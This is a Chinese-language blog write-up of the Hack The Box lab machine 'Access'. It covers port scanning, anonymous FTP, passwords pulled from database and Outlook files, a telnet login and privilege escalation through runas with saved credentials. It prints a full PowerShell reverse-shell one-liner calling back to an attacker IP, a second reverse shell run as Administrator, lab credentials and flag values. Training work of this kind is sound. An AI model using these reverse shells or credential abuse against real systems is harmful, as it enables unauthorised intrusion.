Access-htb-writeup

0x00 靶场技能介绍

章节技能:FTP匿名访问、.mdb文件查看、.pst文件查看、telnet服务账号登录、powershell反弹shell、管理员密码策略枚举、runas用户切换

参考链接:https://www.jgeek.cn/article/69

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.98

2、获取下靶机开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.98      
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:27 CST
Nmap scan report for 10.10.10.98
Host is up (0.48s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.17 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,23,80 -sC -sV --min-rate=1000 10.10.10.98                                                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:42 CST
Nmap scan report for 10.10.10.98
Host is up (1.5s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info: 
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: -8h03m35s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.38 seconds
                                                
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.98 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:44 CST
Nmap scan report for 10.10.10.98
Host is up (0.63s latency).
All 65535 scanned ports on 10.10.10.98 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 21.60 seconds

3、开放的端口还是比较少的,这里有一个大坑,不知道上一个打这个靶机的是谁,把FTP给搞挂了,导致我一直找不到入口点,服了。。。我都开始怀疑是不是我太菜了,一个easy靶机,我已经打了100多台了,我还找不见入口点???

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.98 
Connected to 10.10.10.98.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
ftp: Can't connect to `10.10.10.98:49158': 连接超时
421 Service not available, remote server has closed connection.
229 Entering Extended Passive Mode (|||49158|)
ftp> exit

4、这里重置了下靶机,才恢复正常了,80端口是也网页,什么信息都没有只是一个摄像头视角的照片

http://10.10.10.98/

5、FTP可以匿名登录,这里通过图形界面,先把文件都拷贝下来

6、这里我尝试使用john和hashcat去破解压缩包密码,可能确实比较复杂最后没破解出来

1
2
┌──(kali㉿offsec)-[~/Desktop]
└─$ zip2john Access\ Control.zip > zip.hash

7、不过通过查看.mdb文件发现了一些账号密码信息

1
2
3
4
5
6
7
admin
engineer
backup_admin

admin
access4u@security
admin

1
2
3
4
5
John
Mark
Sunita
Mary
Monica

8、这里使用这个密码,把上面的压缩包给解压了 access4u@security

9、Access Control.pst 这个文件,应该是Outlook数据库文件,看来需要翻邮件了,由于我不想直接用我的outlook加载,我就用下面这个工具,暂时恢复了看看了。BitRecover PST Viewer

10、还是发现了好多信息的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
8/24/2018 7:44:00 AM	


MegaCorp Access Control System "security" account	


Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

john@megacorp.com	

'security@accesscontrolsystems.com'

11、通过邮件可以知道默认的账号密码信息

1
2
3
security

4Cc3ssC0ntr0ller

12、经过尝试,果然是这个用户的账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali㉿offsec)-[~/Desktop]
└─$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

C:\Users\security>dir-
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\security

08/23/2018  11:52 PM    <DIR>          .
08/23/2018  11:52 PM    <DIR>          ..
08/24/2018  08:37 PM    <DIR>          .yawcam
08/21/2018  11:35 PM    <DIR>          Contacts
08/28/2018  07:51 AM    <DIR>          Desktop
08/21/2018  11:35 PM    <DIR>          Documents
08/21/2018  11:35 PM    <DIR>          Downloads
08/21/2018  11:35 PM    <DIR>          Favorites
08/21/2018  11:35 PM    <DIR>          Links
08/21/2018  11:35 PM    <DIR>          Music
08/21/2018  11:35 PM    <DIR>          Pictures
08/21/2018  11:35 PM    <DIR>          Saved Games
08/21/2018  11:35 PM    <DIR>          Searches
08/24/2018  08:39 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   3,347,705,856 bytes free

C:\Users\security>

13、呢就获取下初始的flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 8164-DB5F

 Directory of C:\Users\security\Desktop

08/28/2018  07:51 AM    <DIR>          .
08/28/2018  07:51 AM    <DIR>          ..
05/21/2024  08:40 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,347,705,856 bytes free

C:\Users\security\Desktop>type user.txt
2d8ccaf31bd74d0846f4a0ce8affd102

0x02 系统权限获取

14、由于靶机的初始权限是通过Telnet进行访问的,回显比较慢,我这里构造一个powershell的反弹shell,来稳固下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
C:\Users\security\Desktop>powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.45', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.98] 49157
SHELL> whoami
access\security
SHELL> pwd

Path 

----  

C:\Users\security\Desktop 

SHELL>

15、在初始权限上,想着直接上winpeas.exe工具的,结果有策略限制,没法运行这个工具,只好手工枚举了

16、重点在 Password required No ,登录该账号不需要密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
C:\Users\security>
net user administratorer 
User name                    Administrator
Full Name                    
Comment                      Built-in account for administering the computer/domain
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/21/2018 10:01:12 PM
Password expires             Never
Password changeable          8/21/2018 10:01:12 PM
Password required            No
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/21/2024 8:40:32 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users                
Global Group memberships     *None                 
The command completed successfully.


C:\Users\security>

17、runas 命令: runas 是 Windows 系统上自带的一个命令,通过此命令可以以指定权限级别间接启动我们的程序,而不止是继承父进程的权限。用到的其实是凭证。

18、直接使用runas进行运行反弹shell,获取到管理员的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
SHELL> copy \\10.10.14.45\share\Invoke-PowerShellTcp.ps1 p.ps1
SHELL> dir

    Directory: C:\Users\security

Mode                LastWriteTime     Length Name                                                                                                                                      
----                -------------     ------ ----                                                                                                                                      
d----         8/24/2018   8:37 PM            .yawcam                                                                                                                                   
d-r--         8/21/2018  11:35 PM            Contacts                                                                                                                                  
d-r--         5/21/2024  10:12 AM            Desktop                                                                                                                                   
d-r--         8/21/2018  11:35 PM            Documents                                                                                                                                 
d-r--         8/21/2018  11:35 PM            Downloads                                                                                                                                 
d-r--         8/21/2018  11:35 PM            Favorites                                                                                                                                 
d-r--         8/21/2018  11:35 PM            Links                                                                                                                                     
d-r--         8/21/2018  11:35 PM            Music                                                                                                                                     
d-r--         8/21/2018  11:35 PM            Pictures                                                                                                                                  
d-r--         8/21/2018  11:35 PM            Saved Games                                                                                                                               
d-r--         8/21/2018  11:35 PM            Searches                                                                                                                                  
d-r--         8/24/2018   8:39 PM            Videos                                                                                                                                    
-a---         5/21/2024   6:30 PM       4402 p.ps1                                                                                                                                     


SHELL> runas /user:ACCESS\Administrator /savecred "powershell -nop -exec bypass -file C:\Users\security\p.ps1"
SHELL> 


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 53 
listening on [any] 53 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.98] 49163
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
access\administrator
PS C:\Windows\system32>

19、获取最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Windows\system32> cd C:/Users/administrator/Desktop
PS C:\Users\administrator\Desktop> dir


    Directory: C:\Users\administrator\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         5/21/2024   8:40 AM         34 root.txt                          


PS C:\Users\administrator\Desktop> cat root.txt
8983760b12a9d9aa1a137350431800b6
PS C:\Users\administrator\Desktop>

20、如果靶机可以运行 winpeas.exe 文件的话,估计就直接提权了,结果这里,让我通过Runas来提权。。。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/156

打靶记
#shooting-range
Access-htb-writeup
https://sh1yan.top/2024/05/22/Access-htb-writeup/
作者
shiyan
发布于
2024年5月22日
许可协议